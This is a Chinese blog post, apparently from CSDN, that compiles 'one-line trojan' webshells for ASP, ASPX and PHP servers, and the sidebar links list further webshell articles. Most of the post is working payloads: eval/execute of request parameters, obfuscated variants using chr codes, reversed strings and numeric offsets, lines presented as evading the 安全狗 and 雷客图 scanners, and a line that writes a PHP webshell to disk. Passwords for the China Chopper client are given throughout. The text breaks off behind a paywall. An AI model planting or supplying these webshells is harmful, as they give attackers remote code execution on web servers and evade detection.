AG一句话木马总结

最新推荐文章于 2022-03-17 21:45:00 发布
最新推荐文章于 2022-03-17 21:45:00 发布
阅读量504 收藏
点赞数
分类专栏: 一句话木马 文章标签: 列表 java php web asp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45486362/article/details/106961876
版权
本文详细介绍了ASP、PHP和ASPx的一句话木马,包括Unicode加密方式、密码及绕过技巧。还探讨了如何利用这些木马进行远程控制,并提到了密码如'webadmin'、'abcd'和'AG'。同时,强调了理解木马工作原理和变异的重要性,以加强网站安全防护。
摘要由CSDN通过智能技术生成

asp一句话木马

<%eval request("AG")%>

<%execute request("AG")%>

<%execute(request("AG"))%>

<%execute request("AG")%><%'<% loop <%:%>

<%'<% loop <%:%><%execute request("AG")%>

"%><%execute(request("AG"))%><%' 

AGSEC"%><%eval request("AG")%><%'

<%execute request("asgec")'<% loop <%:%>[code]
[code]<script language=vbs runat=server>eval(request("agsec"))</script>
<%Eval(Request(chr(35)))%> 

<%ExecuteGlobal request("AG")%>

过狗
**

<!–#include file=”dama.txt”–>
if Request("AG")<>"" then ExecuteGlobal request("AG") end if
//容错代码
<%@LANGUAGE="JAVASCRIPT" CODEPAGE="65001"%>
<%
var lcx = {
   '名字' : Request.form('#'), '性别' : eval, '年龄' : '18', '昵称' : '请叫我一声老大'};
lcx.性别((lcx.名字)+'');
%>

**

//使用冰狐一句话客户端链接

程序代码

<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SubCode")) '参数SubCode作为过程代码
o.run "e",Server,Response,Request,Application,Session,Error '参数名e 调用之,同时压入6个基对象作为参数
%>

程序代码

过狗的一句话

<%E=request("AG")%>
<%Y=request("AG")%> 
<%execute(AG)%>
<%Y=request("AG")%> <%execute(Y)%>

<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("ag"))%>

这个是90发的

<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>

密码-7

加密一句话木马 可在此基础上变异 !

全部数字减13,然后十进制解密

<script>
var sun=[73,50,114,133,114,112,130,129,114,45,127,114,126,130,114,128,129,53,47,78,84,47,54,50,75];
var temp=new Array();
for(var i=0;i<sun.length;i++)
{
   
         temp.push(sun[i]-13);
}
var bk=“”;
for(i=0;i<temp.length;i++)
{
   
         bk+=String.fromCharCode(temp[i]);
}
alert(bk);
</script>

运行后得到代码为

<%execute request(AG)%>

以下这个ASP一句话,也许是你见都没见过的!

<%If Request("1")<>"" Then ExecuteGlobal(Request("1"))%>

无防下载表,有防下载表可尝试插入以下语句突破的一句话

<%execute request("AG")%><%'<% loop <%:%>
<%'<% loop <%:%><%execute request("AG")%>
<%execute request("AG")'<% loop <%:%>

备份专用

<%eval(request("1")):response.end%>
<%execute(request("1"))%>

可以躲过雷客图的一句话。

<%
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.ExecuteStatement("ev"&"al(request(""1""))")
%>

不用’<,>'的asp一句话

<script runat=server>execute request("agsec")</script>

不用双引号的一句话。

<%eval request(chr(35))%>

一句话木马多种写法木马

<%Y=request("a")%><%execute(Y)%>  
   
<%eval request("AG")%>
 

<%execute request("AG")%>
 

<%execute(request("AG"))%>

<%A=request("AG")eval A%>

<%If Request("AG")<>"" Then Execute(Request("AG"))%>
 

<%if request ("AG")<>""then session("AG")=request("AG"):end if:if session("AG")<>"" then execute session("AG")%>
 

<SCRIPT language=VBScript runat="server">execute request("AG")</SCRIPT>
 

<%@ Page Language="Jscript"%>

<%eval(Request.Item["AG"],"unsafe");%> 

<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("AG"))%>

<%
Function MorfiCoder(Code)
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
End Function
Execute MorfiCoder(")/*/z/*/(tseuqer lave")
%>

密码:z

dim play
'
'
''''''''''''''''''
'''''''''

play = request("never")

%>
what's your name
<%
execute(play)

%>

<%
i=(Chr(-12590))
love=(Chr(-20306))
you=(Chr(-15133))
OK=i&love&you
CNM=Request(OK)
eVal CNM 'pass:我爱你
%>

菜刀一句话密码:我爱你

<%Execute(DeAsc("%119%136%115%126%50%132%119%131%135%119%133%134%58%52%116%115%133%119%52%59")):Function DeAsc(Str):Str=Split(Str,"%"):For I=1 To Ubound(Str):DeAsc=DeAsc&Chr(Str(I)-18):Next:End Function%>

pass:base

<%
dim x1,x2
x1 = request("h")
x2 = x1
eval x2
%>
<!-- yes++ -->

Unicode加密 ┼癥污爠煥敵瑳∨≡┩> 密码:a
Unicode加密 ┼癥污爠煥敵瑳∨≧┩> 密码:g
Unicode加密 ┼攠數畣整爠煥敵瑳∨∣┩愾 密码:#
Unicode加密 ┼攠數畣整爠煥敵瑳∨≡┩> 密码:a

PHP一句话木马

<?php eval($_POST[AG])?>

<?php @eval($_POST[AG])?>
           //容错代码

<?php assert($_POST[AG]);?>
         //使用lanker一句话客户端的专家模式执行相关的php语句

<?$_POST['AG']($_POST['AG']);?>


<?$_POST['AG']($_POST['AG'],$_POST['AG'])?>

<?fputs(fopen("AG.php","w"),'<?php eval($_POST["AG"]);?>');?>

//本目录下,访问ag.php,用菜刀连接密码:AG

<O>h=@eval($_POST[AG]);</O>

高强度密码:

<?php substr(md5($_REQUEST['AG']),28)=='acd0'&&eval($_REQUEST['AG']);?>

//菜刀提交 http://192.168.1.5/x.php?x=lostwolf 脚本类型:php 密码为 AG

<?php assert($_REQUEST["AG"]);?> //菜刀连接 躲避检测 密码AG

<script language="php">@eval($_POST[AG])</script>

//绕过<?限制的一句话

过狗

<?php require_once (“dama.txt”); ?>

这两个是来自国外的。
站长注意一下了。
第一种:1.php

<?=(])?>
在菜刀里写http://127.0.0.1/1.php?2
最低0.47元/天 解锁文章
凉水沏茶
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
mysql写php木马_PHP一句话木马总结与SQL语句写一句话木马
weixin_35755823的博客
01-27 279
一、基础类的一句话--功能仅限于验证漏洞了,实际中太容易被查出出来:1 2 相信一目了然可以看懂如何使用这类一句话。二、编码的替换的类型:1 2 //会生成34 @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));5 //ph...
木马免杀只需要简单一句话php
02-12
木马免杀只需要简单的一句话代码php文件就可以轻松过,可以参考
一句话木马总结
weixin_45116657的博客
10-25 399
<?php @eval($_POST['cmd']);?> <?php @assert($_POST[cmd]);?> https://www.jianshu.com/p/90473b8e6667
一句话木马
qq_43814486的博客
04-22 2366
条件:1.有服务器的写入权限。2.知道服务器的地址。目的:将我们的一句话木马插入到服务器的asp文件中。 例如:在服务器的地址里创建一个叫virus.php文件里边放代码: <?php system($_GET['cmd'])?> 然后我们就可以通过URL去操控服务器的cmd了,例如访问: http://127.0.0.1/virus.php?cmd=ipconfig 相当于在服...
PHP代码审计之路——5.代码执行及一句话木马总结
qq_24196029的博客
09-27 2182
1. eval 2. assert 3.call_user_func 4. array_map 5. create_function 6.变量 7. preg_replace
全方面角度剖析一句话木马
一生无悔惜缘的博客
08-17 482
全方面角度剖析一句话木马 米斯特白帽子WEB安全攻防培训第二期 讲师:gh0stkey 概念区分 大马、小马一句话? 大马: 一句话:     一句话木马的优势有哪些? 1.短小精悍 1.1隐蔽性强 1.2 运行方便 1.3 便携性强   一句话木马的缺陷有哪些? 可被爆破 常见的一句话木马有哪些? 文档:常用的一句话.txt(有需要的请留言,我私发给你)
ASP一句话木马大全
热门推荐
eldn__的专栏
12-30 2万+
"" Then Execute(Request("MH"))%> ""then session("MH")=request("MH"):end if:if session("MH") execute request("MH") 1 asp一句话木马 一句话木马 服务器端 带验证: ——————————————cmd.asp———————————————— <%
C++输出字符型指针地址
给你一颗小瓜子的博客
10-21 2581
C++标准库中I/O类对<<操作符重载,因此在遇到字符型指针时会将其当作字符串名来处理,输出指针所指的字符串。因此,我们用static_cast强制类型转换把字符串指针转换成无类型指针即可输出指针地址 #include<iostream> using namespace std; int main() { char *p="abc"; cout << p << endl;//"abc" cout << *p &lt
一句话木马总结
u014794539的博客
07-19 2214
一句话木马(简称Webshell)上传到目前web服务目录继而提权获取系统权限,不论aspphp、jsp、aspx都是如此 先来看看最简单的一句话木马: <?php @eval($_POST['attack' ]);?> 利用文件上传漏洞,往目标网站中上传一句话木马,然后就可以在本地通过管理工具即可获取和控制整个网站目录。 @表示后面即使执行错误,也不报错。 eval()函数表示括号内的语句字符串什么的全都当做代码执行 $_POST['attack']表示从页面中获得attack这个参
过安全狗asp大马拿webshell 第一美人
04-21
2013年最新的asp大马。功能最强大的asp大马。可过安全狗。防删除隐藏,第一美人asp大马下载
一句话木马及免杀
Lum1n0us's Blog
08-12 1万+
这篇文章主要是总结一句话木马,并实现一句话木马的简单免杀,以及一个不死马的实现。 文章目录一句话木马及原理一句话木马简单免杀一、assert()二、字符串拼接三、函数四、request请求五、类六、base64加解密七、写入木马不死马 一句话木马及原理 首先,来看最简单的一句话木马: <?php @eval($_POST['cmd']); ?> 前面的<?php ?>是php的文件格式,@是让程序在执行错误的情况下也不要报错,eval()函数是将括号里的内容都当作代码执行,$_PO
WAF SSI
weixin_30654583的博客
02-25 72
http://www.2cto.com/Article/201405/299154.html 转载于:https://www.cnblogs.com/diyunpeng/p/5216819.html
木马学习笔记 1【一句话木马篇】
Sp4rkW的博客
10-27 7102
注意注意:本博客仅供学习交流使用,不可用于任何违法行为中,学信息安全,保卫我国信息安全,爱我中国~ ummmm,之前队内交流提到了线下赛的木马,和表哥们的交流中也认识到很多不足,一边学习,一边进步吧,欢迎大佬留言指点~ 下面从一些基本种类的一句话木马开始讲起【PHP环境】,主要讲述一句话木马绕过及不死鸟木马的原理 1.最最最最基础一句话 eval($_POST["...
一句话木马原理(方法和适用环境)
gl620321的博客
04-19 6446
一.一句话木马原理 黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码: <%execute request(“value”)%> 其中value是值,所以你可以更改自己的值,前面的request就是获取这个值 <%eval request(“value”)%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的实用) 当知道了数据库的URL,就可以利用本地一张...
Web安全攻防-----学习笔记(二)
舞指如歌~的博客
09-07 750
第2章 搭建漏洞环境及实战 在线练习平台:https://www.ms08067.com/about/bachang.html 2.1在linux系统中安装LANMP LANMP是linux下Apache、Nginx、MySql和PHP的应用环境,本节演示WDLinux的一款集成安装包,首先下载安装包,命令如下: wget http://dl.wdlinux.cn/files/lanmp...
2017-01-27-一句话木马原理详解
Be Smart
03-17 4779
layout: post title: “一句话木马原理详解” categories: [网络安全CyberSecurity] tags: [一句话木马] 作者:愤怒的小辣椒 链接:https://www.zhihu.com/question/269213687/answer/1088999932 来源:知乎 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。 首先理解,eval()是把里面的内容按照php代码去执行 菜刀通过你的一句话木马去进行http请求,然后用经过base64编.
AG7111三转一双模开关转换器中文数据手册
"AIGOLTEK AG7111 是一款三转一双模开关转换器,能够将HDMI、DVI、DisplayPort三种接口互相转换,并提供了中文数据手册供用户参考。该转换器适用于多种显示设备间的信号切换,旨在解决多类型接口不兼容的问题。" AG...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凉水沏茶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值